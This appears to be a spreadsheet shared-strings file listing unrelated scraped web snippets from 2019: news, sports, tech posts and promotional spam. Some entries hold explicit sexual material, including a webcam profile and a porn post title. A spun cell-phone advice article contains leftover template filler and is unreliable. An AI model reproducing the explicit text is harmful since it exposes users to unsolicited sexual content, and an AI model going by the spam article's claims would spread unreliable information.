  <si>
    <t>France's president has told new UK prime minister Boris Johnson there could not be a "reshuffling" of the deal the leave the European Union.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. World Cup 2018: All you need to know Sunday 11 August 2019 04:48 PM UTC-05 | Tags: credit-counseling https://m.youtube.com/watch?v=p_vGwB_uJgA With so many teams, fixtures, groups and timings you would be forgiven to lose track of your favorite team’s schedule. Tags: credit-counseling</t>
  </si>
  <si>
    <t>Scout works with a lot of local restaurants to get the word out about the cool and delicious things they’re doing, but they couldn’t do what they do without access to awesome ingredients. To get what they need, culinary creatives depend on personal networks of passionate artisans, farmers and producers who often work hard without ever seeing the glory they deserve. Since it’s always good to recognize those who have your back, we bring you the Supplier Shout Out! In this latest edition, Chef Curtis Luk of Cibo Trattoria highlights the summer ingredient currently making a guest appearance on the restaurant’s dessert menu… Which one of your suppliers do you want to give a shout out to? Glorious Organics. What does this supplier supply you? Rhubarb. How is this ingredient featured on your menu? We are currently using it in our summer featured tarts ($10 each). The dessert is available for both lunch and dinner. Cibo Trattoria Neighbourhood: Downtown 900 Seymour St. | 604-602-9570 | WEBSITE Cibo Trattoria Chef Curtis Luk Gives a Supplier Shout Out to Glorious Organics Cibo Trattoria Announces New Series of Italian Wine Dinners Beginning April 25th</t>
  </si>
  <si>
    <t>Less than 1½ hours after applications for the state government's solar rebates reopened, the 3767-home allocation for the whole month was exhausted.</t>
  </si>
  <si>
    <t>JELLYFISH TANK – ADVENTURE AQUARIUM, CAMDEN NJ – New Jersey Travel Tour Guide Animals Zoo The post JELLYFISH TANK – ADVENTURE AQUARIUM, CAMDEN NJ – New Jersey Travel Tour Guide Animals Zoo appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Rob</t>
  </si>
  <si>
    <t>Antifa’s prayers are answered! Via The Sun: A new futuristic sex robot equipped with “full artificial intelligence” has hit the market – with bosses vowing the dolls can replace human intimacy. AI-Tech promises its flagship model, Emma, can hold an interactive conversation and answer questions in a way tailored to its owner. The AI girlfriends […]</t>
  </si>
  <si>
    <t>There are so many cell phone options out there. Each model has some tips and tricks to make them very useful. Continue reading to learn a few of them. TIP! Restart your phone to erase memory that is not needed. Performing this function is the best way to ensure that the phone is working at optimum levels at all times. Don’t rush into buying the latest, greatest phone. Occasionally, the price does not justify the upgrades. Newly released cell phones often have only minor changes and updates. Look at reviews before you decide on buying a new phone. You usually will not have to. TIP! Don’t decide your phone is broken just because you got it wet. Take the battery out and put it into a bowl full of rice. If you’re utilizing cell phones and have to call information, you shouldn’t pay hefty fines. You can call 1-800-411-FREE instead. After listening to an advertisement, you will get all the information you requested. TIP! Be careful if you watch videos while using LTE or 4G. Your cell phone plan likely comes with a data allowance for the month. Be aware that smartphones actually slow down in performance over time. Downloading software updates can prevent a phone from really becoming obsolete. These updates are more powerful and larger. In a couple years, the upgrades might not work on the older phones. TIP! If you are like most smartphone users, you probably use your phone almost constantly. That said, be sure to power it down from time to time. Smartphones will actually run slower as they age. With time, things like updating apps may become cumbersome. When this begins to happen, you will need to make a decision. You can stick with what you have, but not update it, or you can get a new phone that can handle the updates. TIP! Cell phones get slower with age. If so, installing new apps and updates to your phone can become difficult. When buying a newer cellphone, take time to compare phones in actual physical stores. The few hours you spend will be worth it. That way, you’ll better your chances of getting a phone that you’ll enjoy. TIP! When you need to purchase a new phone, comparison shop in real stores instead of online. Invest time in looking at different models and remember to test their features. Make sure you actually need a smartphone before buying one. Smartphones are costly, but they have lots of benefits. However, some people only require a basic phone for placing calls. Smartphones not only cost more up front, but require a higher fee each month. This may not be the smartest choice for you. TIP! Do you need a smartphone? These will cost you a pretty penny but provide a wealth of options and services. The problem is, some people just need a basic phone to make calls with. Cell Phones TIP! Make sure your phone stays out of water. Many people make the mistake of dropping their phone in water and ruining it. If you’ve been wanting to learn more about cellphones, you know that there are many to learn about. Though cell phones vary in many aspects, many tips and tricks are universal across most cell phones. This piece has offered some of those very insights, so take full advantage of them. TIP! You may have a favorite cell phone brand, but you should also explore other brands. It may take some time to learn a new screen layout or interface, but keep your mind open. Now you can see that betamax rate is a complex topic. Not only do you need accurate information about betamax rate , but it also needs to be timely and up-to-date, as well. Blue widgets will now be easier with the tips from this piece.</t>
  </si>
  <si>
    <t>The West Midlands Police officer suffered serious head and pelvic injuries. Read more? Click here</t>
  </si>
  <si>
    <t>Walt Disney Co is set to launch its family-friendly streaming service, Disney+, later this year with a slate of new and classic TV shows and movies, as the company founded on theme parks and big-screen movies builds a digital entertainment business.</t>
  </si>
  <si>
    <t>My Kinks: stockings, high heels Webcam profile: Hi, guys! I’m a hot lady who likes to have some fun!I love to meet new and interesting people, to make new friends and to fuck their brains out :P. I love to have fun in front of the camera, to masturbate and to cum at the same time as you do. Favourite sex position: Soggy What I do in my amateur show: Seeing you getting hard What I don’t like: Rudeness Gallery</t>
  </si>
  <si>
    <t>rknell</t>
  </si>
  <si>
    <t>Just came up on the product compare app, looks like a good deal. PRODUCT HIGHLIGHTS SKU: TOKYOPLUSSIL Driver Diameter (mm): 6 Frequency Response: 20Hz-20kHz（+1/-3dB） Impedance: for speaker 16Ω±15% Sensitivity: 93±3dB NFC: No Bluetooth : Yes (v5.0) Battery Type: 460mAh</t>
  </si>
  <si>
    <t>Newcastle United Head Coach Steve Bruce boosted by the return of Joelinton and Miguel Almiron This post written by Lee Ryder originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>The potential timing of former Wallaby Israel Folau's legal fight could distract from Australia's Rugby World Cup campaign in Japan.</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/circuitbreaker/2019/8/29/20839528/apple-airpod-ad-korea-cases-bts-line-headphones-wireless-accessories This Korean AirPods ad makes me jealous of international case options Apple is running a new AirPods advertisement in Korea that shows off a fun side of the popular wireless headphones that the company hasn’t really focused on before: the potential to customize your AirPods by adding a fun, colorful case. There’s a wide variety of cases on display that are modeled after BTS’s BT21 Line characters, Kakao Friends mascots, and more. It’s not clear whether Apple is using the ad to showcase a bunch of cases that third parties in Asia offer or if this is a prelude to it selling (or even designing its own) AirPods cases in its own stores, but its definitely a fun look. AirPods cases aren’t new — there are loads of options out there, including the obvious best case, which turns them into a fidget spinner — but… Continue reading… Source: https://www.theverge.com/circuitbreaker/2019/8/29/20839528/apple-airpod-ad-korea-cases-bts-line-headphones-wireless-accessories The post This Korean AirPods ad makes me jealous of international case options appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>It appears the damning report last week that found Prime Minister Justin Trudeau broke federal ethics with his political interference in the SNC-Lavalin scandal isn’t resonating much with voters. A new Ipsos poll conducted exclusively for Global News suggests the Liberals and Conservatives are in a virtual dead heat, with the Grits up two points since last month to 33 per cent of the decided vote and the Tories at 35 per cent, a two-point drop. READ MORE: Majority of Canadians want change in Ottawa, 37% say they’d vote Conservative: Ipsos The online poll, weighted to balance census demographics, was conducted between August 16 and 19, in the wake of the ethics commissioner’s report on SNC-Lavalin, on behalf of Global News and is accurate to within 3.5 percentage points, 19 times out of 20. “I think the eight weeks of coverage we had in the spring of the SNC-Lavalin affair really solidified things for people and I think what we saw last week was a confirmation of public views, so we saw very little change,” said Mike Colledge, president of Ipsos Public Affairs. “I don’t think what we saw last week shifted anything. It confirmed what people saw in the spring and basically hardened their positions, if anything.” The poll also suggests Trudeau and Scheer are virtually tied when it comes to who voters think would be the best prime minister: 32 per cent say Conservative Leader Andrew Scheer, a drop from 36 per cent in July, while 30 per cent say Trudeau compared to 32 per cent last month. In third place is Green Party Leader Elizabeth May at 21 per cent, up from 17 per cent last month. WATCH BELOW: Ethics, accountability, the Trudeau brand and pollsters Those results come as Trudeau has repeatedly refused to apologize for what Ethics Commissioner Mario Dion determined was repeated and improper misuse of his office to try to help the Quebec engineering giant avoid a criminal trial by pressuring the former attorney general to cut the company a deal. Trudeau’s refusals have been followed by assertions that he was doing his job protecting jobs he insists would have been at risk if the company faced criminal prosecution for allegedly bribing Libyan officials. READ MORE: Trudeau broke ethics rules by trying to exert influence in SNC-Lavalin scandal: report SNC-Lavalin has said it did not make that claim during its lobbying for a deferred prosecution agreement, which would let the company negotiate non-criminal penalties for the alleged activities. It appears voters in Quebec are buying the argument. According to the poll, the Liberal lead over the Conservatives in Quebec strengthened over the last month. The Grits now stand at 41 per cent support in Quebec compared to 37 per cent last month. The Tories are polling at just 22 per cent in the province, a drop of two points since July. READ MORE: Wilson-Raybould says she was contacted by RCMP amid SNC-Lavalin scandal Colledge attributes the Liberal numbers in that province to two factors: some approval for Trudeau’s handling of the SNC-Lavalin scandal but also a wait-and-see attitude that is leading many to park their votes for the time being. “I think there’s some approval for SNC and defending the home company, and there’s also a bit of vote moving around in Quebec, where people are parking their votes in Quebec and they’re not sure who they’re going to vote for,” he said. “I think it’s all very volatile in Quebec right now and I don’t know that party attachment is as strong as it used to be … we’re seeing a sit-back-and-wait a little bit in Quebec.” In Ontario, the signals from voters are more mixed. The Conservatives hold 37 per cent support in Ontario compared to the Liberals at 34 per cent. That’s compared to 38 per cent and 32 per cent respectively last month. WATCH BELOW: Most Canadians want change in Ottawa: Ipsos poll While approval ratings for the Liberals were at 50 per cent in Atlantic Canada, 43 per cent in Quebec and 41 per cent in B.C., voters in Ontario had approval ratings at 36 per cent while those in Alberta and the Prairies were at 22 per cent and 20 per cent. Colledge said while those numbers show the Liberals gaining slight ground in Ontario, the battleground remains the suburbs of the Greater Toronto Area. There, he said, voter concerns aren’t on SNC-Lavalin but on issues of affordability, as well as fears that the rosy messaging from the Liberals on big-picture economic outlooks doesn’t match the everyday crunch voters feel when it comes to buying groceries and affording their homes. And given that, expect to see the opposition parties continue to hammer the government on the scandal, Colledge predicted, if only to try to keep the Liberals from being able to talk about their own agenda. “Right now, what SNC does — outside of Quebec — is it takes the Liberals off of their game. They’re defending SNC instead of talking about their progressive agenda and the things they’ve done in the past and want to do in the future,” he said. “So I think you’ll see the opposition parties continue to push on SNC even if they don’t think they’re going to make gains because they’d much rather keep the Liberals talking about what they did and why they did it than moving forward with their agenda.” With both parties on even footing just weeks until the expected start of the campaign, Colledge says the question will be how effectively the Tories will be able to force the Liberals off-message by focusing on past scandals — and whether both parties can craft a pitch to voters that goes beyond big-picture economics. And if RCMP open an investigation into SNC-Lavalin scandal, as Scheer has called on them to do, Colledge says all bets are off. “That’s a bit of a wild card.” © 2019 Global News, a division of Corus Entertainment Inc. Source link</t>
  </si>
  <si>
    <t>submitted by /u/Cockamamie43 [link] [comments] The post Two Strangers Spitroast My Blonde Hotwife appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190829/p3#a190829p3 Apple announces a new repair program in the US that will expand access to genuine iPhone repair parts for independent repair businesses (Apple) Apple: Apple announces a new repair program in the US that will expand access to genuine iPhone repair parts for independent repair businesses — New Independent Repair Provider Program Expands Genuine Parts Access to More Repair Businesses — Cupertino, California — Apple today announced a new repair program … Source: http://www.techmeme.com/190829/p3#a190829p3 The post Apple announces a new repair program in the US that will expand access to genuine iPhone repair parts for independent repair businesses (Apple) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Bryan Anthony Davis</t>
  </si>
  <si>
    <t>Charles LeClaire-USA TODAY Sports Much to the chagrin of most, BTSC’s Nostradumbass predicts the Steelers’ initial preseason game of 2019 vs. the Buccaneers. The Steelers return after an excruciatingly-long lay-off to return home and battle the Bucs. Will James Conner and JuJu Smith-Schuster play more than a series? Will Sutton Smith make noticeable impact? Did Mike Tomlin alter his coaching philosophies at all? With these questions, storylines, and more, I’ve compiled a list of predictions (some basic, and some utterly idiotic) to look for in this preseason contest: Unlike the offspring of Oakland’s new No. 84, Ben Roethlisberger’s kids don’t ask where Antonio Brown is. Along with Roethlisberger, Joe Haden, T.J. Watt and Maurkice Pouncey do not see action Week 1. Just like Ryan Shazier’s 2014 Heinz Field debut, Devin Bush intercepts a pass and electrifies the home crowd. Newly-minted shades pitchman JuJu Smith-Schuster scores a TD and repels up to the press box to hand out Oakley sunglasses to members of the media. Ed Bouchette seems unimpressed with the new PRIZM technology. Benny Snell Jr. and Jaylen Samuels both score on touchdown runs. Well neither rusher gets the upper hand, Snell racks up more yardage. Since his Jets played on Thursday at MetLife Stadium, Le’Veon Bell takes an Uber to the Steel City and performs his latest single “Miss me yet?” for confused patrons at Pizza Fiesta just trying not to get sauce on their sombreros. A revitalized Steelers defense racks up four sacks. Both James Washington and Terrell Edmunds significantly improve from their rookie campaigns and shine in a big way. Washington makes five grabs, while Edmunds picks off a pass. A yinzer carries in a sign that has something to do with “cold feet” regarding a certain and infamous Steelers WR from yesteryear and his cryogenic chamber mishaps. In an imperfect but still palatable contest, the Steelers prevail 21-17. During his post-game press conference, Coach T answers every question by refusing to paint with a “broad brush”. Bruce Arians snubs Mike Tomlin during the postgame handshakes because of his sustained grudge against the man that canned him. Will any of this actually happen? I’ll bet at least one or two. Heck, maybe every one of them. Be sure to post your predictions — basic or bizarre — below.</t>
  </si>
  <si>
    <t>You own this one, libs.</t>
  </si>
  <si>
    <t>RuPaul's Drag Race UK is coming soon to a device near you. I have no idea what that means, but it's...</t>
  </si>
  <si>
    <t>Transfer Rumours: Barcelona and Juventus NANJING, CHINA – JULY 24: Juventus player Joao Cancelo during the International Champions Cup match between Juventus and FC Internazionale at the Nanjing Olympic Center Stadium on July 24, 2019 in Nanjing, China. (Photo by Daniele Badolato – Juventus FC/Juventus FC via Getty Images) Footy News’s Football Transfer News looks at the latest transfer rumours from around world football. In today’s edition, more possibilities in the Neymar saga and Juventus continue to sell great players. European Transfer Rumours The Neymar Transfer Rumours Have Life! Just when the footballing world began to think the Neymar-to-Barcelona rumours had died out for the summer, they pop right back up. L’Equipe reported this morning that Neymar and Paris St. Germain were working towards a resolution; with August 10th representing the latest ‘most crucial’ date. Now if that resolution results in a decision to sell, then Barcelona is waiting, with options, PSG really doesn’t want. Mundo Deportivo wrote this morning, in response to the L’Equipe piece, that Barcelona could not possibly pay PSG’s price for Neymar this summer. They believe PSG would have two options if they decide to sell Neymar back to Barcelona. The first option is a loan with an obligation to buy next summer. Similar to how PSG acquired Kylian Mbappe from AS Monaco, Barcelona would pay a significant loan fee this summer, and a lower, but still large transfer fee next summer. However, Mundo wrote in their article that Barcelona would still need to move someone in order to absorb Neymar’s salary. The other option for PSG is taking one or two Barcelona players along with some cash in a deal. Those players, you already know, are Philippe Coutinho and Ivan Rakitic. It seems highly unlikely that PSG will give in to Barcelona’s demands on those players after holding out all summer. Juventus Selling Cancelo? After rumours of Paulo Dybala to Manchester United and the sale of Moise Kean to Everton, it looks like Juventus could have one Premier League deal left. According to Fabrizio Romano Juventus could still sell Joao Cancelo to Manchester City. The report by Romano says that Man City has offered Danilo plus cash for the Portuguese right-back. He also believes Juventus are looking for around €60 million for Cancelo. So depending on Juve’s valuation of Danilo, Man City should need to offer something like €40 million to get a deal done. Now there are only seven days left in the Premier League transfer window, so deals like this will be extremely hard to get done. But these two sides have been in negotiations all summer so they could get a deal done. This post Transfer Rumours: Barcelona and Juventus appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Canada bounced back with a strong performance on Saturday, waiting out an early rain delay to beat Italy 10-0 at the Little League World Series. CBC | Sports News Canada’s offence comes alive with emphatic victory over Italy at Little League World Series</t>
  </si>
  <si>
    <t>The Reserve Bank of New Zealand cut the official cash rate by 50 basis points to 1.00%, as it looks to prop-up a cooling economy in the face of intensifying global pressure.</t>
  </si>
  <si>
    <t>The head of the Film Classification Board has also banned a film for “promoting lesbianism”. The post Ezekiel Mutua: The man who polices Kenyan pop music appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>His bid for recognition eventually paid off spectacularly — in Steven Spielberg’s 2018 movie “Ready Player One.” To save his world at the movie’s climax, Parzival, the hero, must play Atari “Adventure” and unlock its Easter egg. “You see, Warren Robinett was proud of Adventure,” Parzival explains as he plays. “That’s why he created the first digital Easter egg!” These days, Easter eggs are anything but acts of defiance. They are meant to entertain, to lure potential hires, to pay tribute to executives — or to amuse the programmers themselves. Google’s Mario maps At Google, there is a long tradition of Easter eggs, which have the full support of the company. “It helps establish software as an art form, following in the footsteps of painters and musicians and craftspeople sneaking little jokes and references into their work for literally centuries,” said Dan Sandler, who works on the Android smartphone software. Mr. Sandler has built an eggy surprise into every version of Android since 2011. For the current version — Android P — he created a secret painting app. “One of the themes in the P release was ‘digital well being,’ the idea that you should be able to choose a balance of screen time and non-screen time,” he said. “In my paint app, over time, the strokes you draw fade away to nothing, like a Zen drawing board.” (He notes that you can tap the hourglass to pause the timer, “if you must.”) There’s no Save command, either. “This is another Zen thing: Don’t cling to your creations,” he said. In the Google Maps division, the best-known Easter egg appeared on March 10, 2018. It was International Mario Day (Mar10, get it?), celebrating the goofy Italian plumber from Nintendo’s video games. Source link</t>
  </si>
  <si>
    <t>The House of Commons adjourned on Thursday 25 July for summer recess – normally a time for MPs to spend in their constituencies, with their families or on holiday. As per the parliamentary timetable, the Commons Chamber will sit again on Tuesday 3 September 2019 at 2.30pm. The Brexit date of 31 October is nearing and MPs who are concerned about the Prime Minister’s willingness to leave the EU without a deal have demanded that he recall parliament early and face the Commons with his proposals. Could it be recalled early? Pressure on Mr Johnson has ramped up following a leak of no-deal warnings that said it would cause “incredibly serious” economic harm to the country. Shadow chancellor John McDonnell on Monday threw his weight behind demands for Mr Johnson to cut short summer recess to face MPs at Westminster, saying Labour wants to see Parliament reconvened “in the next few days”. And more than 100 other MPs signed a letter demanding Mr Johnson recalls Parliament. But there has been no suggestion from Number 10 that Mr Johnson will cave into demands, meaning MPs who oppose no deal could have to wait another two weeks to have any opportunity to stop it. Mr Johnson could face a series of Brexit challenges in the first week back (Photo: Getty Images) What could happen in the first week back? The first few days back in the Commons are likely to be pretty hectic for the prime minister, who is facing several challenges from MPs determined to stop him from following through with a no deal. 3 September: MPs return Labour has said it intends to call a vote of no confidence in the government as soon as possible – if it thinks it can win – which means Mr Johnson could face his first big challenge any day this week. Mr Corbyn said last week that, if he wins the vote, he would try and form an interim government with himself as “caretaker prime minister”. He then intends to immediately delay Brexit to avoid leaving without a deal on 13 October and call a snap general election. Read more: Boris Johnson could face no-deal Brexit hurdle as plan to prevent him suspending Parliament is fast-tracked 4 September: Northern Ireland report The Government is due to report back on devolution in Northern Ireland which could provide the opportunity for MPs to table amendments designed to prevent a no-deal Brexit. As this is a Wednesday, the Prime Minister will also be grilled by Jeremy Corbyn in the first installment of Prime Minister’s Questions. 6 September: No-deal Brexit court case A Judge in Scotland has set this as the date for a fast-track hearing on whether Mr Johnson can legally suspend Parliament to force through a no-deal Brexit. More than 70 MPs and Peers have filed a petition at the Court of Session in Edinburgh attempting to block him from being able to prorogue Parliament and called for the case to be heard before the 31 October 31 Brexit date. Judge Lord Raymond Doherty agreed to expedite the timetable for the legal challenge to take place, setting the date for the substantive hearing as the Friday. More politics news Brexit Party candidate rants at pro-EU Tory 'traitors' in online video This is what happens if the UK leaves the EU without a deal Corbyn under pressure as senior Labour figures back campaign to Remain It's not actually wartime, so we need a deal, says ex Tory minister Corbyn says election will halt Brexit crisis and change UK's direction Boris Johnson to tell EU: UK Parliament can't stop no-deal Brexit The post When parliament will resume after summer recess 2019 – and the schedule for when it does appeared first on inews.co.uk. The post When parliament will resume after summer recess 2019 – and the schedule for when it does appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Created as the accompanying technology for Bitcoin, today Blockchain is in high-demand and even more popular than the cryptocurrency. Interest in the evolving solution grows every day, and it’s expected that worldwide spendings on the tech will reach 12.4 billion U.S. dollars by 2022. That’s because the solution can be used and implemented in different ways in industries from banking to healthcare. Cybersecurity is a top use. Due to the increasing amount of DDoS and other attacks, the question of safety and security of the digital info was awarded the status of the highest priority for 75% of CEOs in 2019. Blockchain technology: the next big thing in cybersecurity Today cyber attacks happen more and more frequently. Companies with big databases are the main target of fraudsters. Thus, in October 2018, the Facebook database was hacked and cybercriminals got access to the personal info of 30 million users. It’s a pity, but it’s a growing threat and such situations are pretty common. Living in the digital era, safety and security is a crucial aspect to think about. Blockchain technology can become the answer and a way to combat customer data theft. Highly secure private messaging Companies take care of the in-house confidence and security of the data. That’s why it’s a crucial thing to secure emails, messaging, chats, and social media exchanging personal and private data between the employees. Besides that, a lot of information is collected from consumers by means of exchanging via social media. SEE ALSO: How to prevent and react to cybersecurity threats Today end-to-end encryption used by the majority of messaging ecosystems can’t ensure total security. All that can improve by implementing blockchain technology. The solution facilitates unified communication between various messaging platforms, securing all info exchanges. Improved PKI solution Public Key Infrastructure encrypts messaging apps and other methods of communication nowadays. The big drawback of PKI utilized in the applications is that they rely on third-party certificate authorities, which are an easy target for cybercriminals. Thus, hackers can penetrate communications using fictional identifies pretending to be a person you write to. The system can improve by integrating blockchain solutions. Storing and publishing the keys on the blockchain, you make the app impenetrable to attacks and eliminate the risk of verifying false key generation for compromising data. Safer DNS The biggest drawback of the existing DNS (Domain Name System) is that a big part of it remains centralized. That makes it an easy target for cyber-criminals who can intrude on the connection between the site DNS and IP to manage for a while. Hackers can combine DNS with DDoS attacks to crash down the service for a significant period of time. By implementing blockchain solutions, you’ll decentralize the system. That will make the search for the single compromised target more complex for hackers. In such a way, a distributed ledger is used for storing the domain information. Plus, sustained smart contracts created will power all the connections. IoT Security IoT technology widens possibilities and makes life easier. Meanwhile, it makes your routers, switches, security cameras, doorbells, and other smart devices vulnerable. Hackers can get access to the systems by depleting weaknesses in firmware. The integration of blockchain can decentralize the authority making devices “smart” enough to lock down any suspicious nodes without asking a central authority. Besides, the exchange of data between IoT devices will be secure too. No central authority means staging an attack harder, or maybe even impossible. Prevention of DDoS attacks A Distributed Denial-of-Service (DDoS) attack is a nightmare for all companies with large data holdings. Slowing down or shutting down service, no access to the service for the legitimate systems, denial of the service for users and, in the end, compromised website data. That is what a DDoS attack looks like. SEE ALSO: Adopt continuous automation in DevOps to accelerate your business Today the biggest difficulty and problem in preventing DDoS attacks is the partial decentralization of DNS, as mentioned above. That means that hackers can crash one site after another by targeting the centralized part of DNS. Integrating blockchain technology can solve the problem and reduce and eliminate the risks of fraud and attacks. Decentralizing all the systems makes them harder to target. Is Blockchain the answer to cybersecurity? Nowadays, blockchain technology promises better security. It expects to reduce your vulnerability and decrease a vast number of successful cyber attacks in the near future. The highlight of the solution is decentralization, the key factor in cybersecurity. Certainly, with improved security, comes more sophisticated hackers and their skills. Anyway, the implementation of blockchain into your safety and security systems makes the task far harder for cyber-criminals and fraudsters to exploit.</t>
  </si>
  <si>
    <t>Crews were already tackling two major fires on Ilkley Moor when the 20-year-old started the blaze. Read more? Click here</t>
  </si>
  <si>
    <t>Lou Williams credits Mo Cheeks for giving him first NBA break Original Source L.A. Clippers guard Lou Williams was in the mood for some Q&amp;A with his fans on Twitter last night. One of the questions that surfaced came from Twitter user @tommys54321, asking Williams which player or coach had the most impact on him. With that, Sweet Lou credited his former coach Mo Cheeks for giving him his first NBA break back in 2008. Mo cheeks gave me my first opportunity https://t.co/xQ4BWE8wHQ — Lou Williams (@TeamLou23) August 31, 2019 Williams was never a highly-touted prospect when the entered the NBA in 2005. He arrived to the league as a scrawny 6-foot-1 guard straight from high school and was just a mid-second round selection by the Philadelphia 76ers in the 2005 NBA draft. After 14 years, Williams is now one of the most feared scorers in the game and has a record three Sixth Man of the Year awards attached to his resume. Not too shabby for someone that was overlooked 44 times during the draft. Williams played sparingly in his rookie season, appearing in just 30 games and playing 4.8 minutes per contest. Following his forgettable, debut campaign, Philadelphia sent him to the NBA D-League in late November. Williams played well in his short stint in the D-League and was called up to the main roster nearly a week later. With the Sixers trading then-franchise superstar Allen Iverson in December 2006, Williams had the chance to showcase himself, though he didn’t get much burn in his sophomore season, either, averaging just 11 minutes through 61 games. His third season, however, proved to be the turning point. Under coach Mo Cheeks, Williams had a breakout campaign with Philadelphia in the 2007-08 season. He averaged 11.5 points, 2.1 rebounds, and 3.2 assists across 23 minutes per game off the bench and helped lead Philadelphia to their first playoff appearance during the post-Iverson era. Shaq’s Savage Reaction To Dwight Howard Joining Lakers | CP NBA Pod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‘819338648198169’); fbq(‘track’, “PageView”); fbq(‘track’, ‘ViewContent’);(function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/sdk.js#xfbml=1&amp;version=v2.4”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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Lou Williams credits Mo Cheeks for giving him first NBA break appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>It is my tour video of Mumbai after completing my engineering…. The post Mumbai tour ##gate way of India &amp; The grand taj hotel appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>We’ve been fascinated with Anakin the Bernese Mountain Dog for a while now.</t>
  </si>
  <si>
    <t>Saturday 3 August 2019 GLS’ expensive public school education at The Anthony Tonkin College For Ordinary Boys meant our grasp of Latin is second to none. For instance, the verb ‘to mack’ means to complain endlessly. Mackie (he complains endlessly) Mackem (they complain endlessly), and so on. Ironically on Saturday, KRob wore the same waistcoat and tie combo for the 1-1 draw with Sunderland as the substitute Latin teacher GLS once gaffer-taped to the blackboard in Room 6b. Monday 5 August 2019 Oxford United’s lessons in Brexit. Step 1: actively devalue your crippled reputation for no apparent reason as the EFL have done by announcing that the Football League Trophy will be known as the Leasing.com Trophy. Step 2: allow your valued assets to leave for the European mainland where they will be better treated as Leeds are set to do with Kemar Roofe heading to Anderlecht. Step 3: blame everyone else for the mess you created as Sunderland manager Jack Ross did following our draw with them on Saturday. Tuesday 6 August 2019 I AM NOT A NUMBER. Except if you’re an Oxford United player you are. The club have announced an innovative shirt numbering system where every registered player will have their own squad number. Junior players can aspire to achieving the smaller numbers, according to KRob, which should be motivation enough for little James Henry at 17 or young Jamie Mackie at 19. The club haven’t yet announced the competition for the first person to spot a pushy-parent in the club shop making a humblebrag order for a replica shirt with their darling little cash machine’s three figured number emblazoned on their back. Wednesday 7 August 2019 Former Oxford striker John Aldridge has endorsed Ben Woodburn’s season long loan. Aldridge, who described Oxford as a “poxy club” before leaving for Liverpool in 1987 and hasn’t returned for single reunion or anniversary in the intervening 32 years said “it’s a great club with great fans”. Thursday 8 August 2019 Benji Buchel’s dream of playing in some godforsaken corrupt country who has bought the rights to staging the 2020 Europa League Final looks to be over. He shipped five goals for no reply in the home leg of their latest qualifier against Eintracht Frankfurt. That’s right, the home leg. The second leg in Frankfurt is next week, #prayforbenji. Friday 9 August 2019 Tiger had a grrreat Five Minute Fans Forum on Radio Oxford yesterday, dangling a bunch of intoxicated carrots as if Jerome Sale were Bugs Bunny on meth. I wish I could tell you more about the stadium, he said, there’ll be an exciting announcement soon. Exciting times, will it be as exciting as the announcement from OxVox which is due in a couple of years ago about the future of the stadium or even the building of a temporary fourth stand, which will be ready for the 2016 derby game against Swindon? Tomorrow marks Jose’s son, John Mousinho’s 500th game ‘I remember my debut like it was last week’ he said, ‘I gave away possession in a critical part of the field’. ‘No, that was last week’, said one of the clubs sports analysts. ‘And the week before’ he continued flipping through his clip board. ‘And the week before that’ he continued not reading the mood of the room.</t>
  </si>
  <si>
    <t>The new version of Ghostbusters: The Video Game will be released in October. The Ghostbusters HD Reissue: The Video Game will be available in digital and commercial formats on October 4th, according to the announcement made today. Announced in May, the Saber Interactive title will be available on PS4, Switch, Xbox One and PC via Epic Games Store. A boxed version of the game can now be pre-ordered at retail for the consoles. It is also available in digital pre-order. Originally released in 2009 on multiple platforms, in the game you play as a rookie in the team and you team up with the original cast. Supporting characters Annie Potts, Brian Doyle-Murray, William Atherton and the fabulous Max von Sydow also lend their voices and resemblance to the game. The post Ghostbusters: The remastered video game will be released on October 4, first appeared on VG247.</t>
  </si>
  <si>
    <t>Isaac Hayden has hailed former Newcastle United goalkeeper Tim Krul for the way that he has got back to the top of his game after serious injury blighted his final months at St James’ Park. Krul, 31, missed over a year of action after rupturing his cruciate ligament in October 2015 but how now returned to the Premier League with Norwich and helped the East Anglia side win 3-1 against... Source</t>
  </si>
  <si>
    <t>The small business ombudsman says the unfair dismissal jurisdiction is a "pain point" for small business and needs reform.</t>
  </si>
  <si>
    <t>STRICTLY COME DANCING is back with a brand new line-up, and ahead of it returning to BBC One next month, Anneka Rice has spoken out about needing help and the person she has turned to for advice. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Anything Facebook’s Libra can do, Celo wants to do better. Last week, crypto startup and Libra competitor Celo unveiled its software development kit (SDK), which allows developers to build mobile-based decentralized finance (DeFi) apps on its protocol. This gives developers the tools aimed at building a more inclusive and decentralized monetary system with the full-stack Celo platform. And while Libra similarly offers a full-stack approach to building blockchain-based financial tools, Celo executives say the comparisons between Celo’s algorithmic stablecoin platform and Libra’s centrally issued fiat-backed digital currency should end there. “We think that Facebook’s interest in this space is a very positive sign and all efforts to reach the 1.7 billion unbanked adults should be welcomed,” Celo’s Community Lead Vanessa Slavich told Decrypt in an interview. She explained, however, that there are several key differences between Libra and Celo, namely in their governance models. Celo, she said, is permissionless and decentralized, whereas Libra is not. But on top of that, Celo isn’t hindered by the “substantial pressure” Facebook and its partners involved with Libra are currently facing from regulators and government bodies around the world, Slavich said. Backed by a $30 million investment from VC firm Polychain Capital and the crypto wing of Andreessen Horowitz, Celo is the company behind a new proof-of-stake blockchain by the same name. The company’s technology uses a phone number based identity system with address-based encryption. Celo’s stablecoins are stable value currencies, implemented by an algorithmic reserve-backed 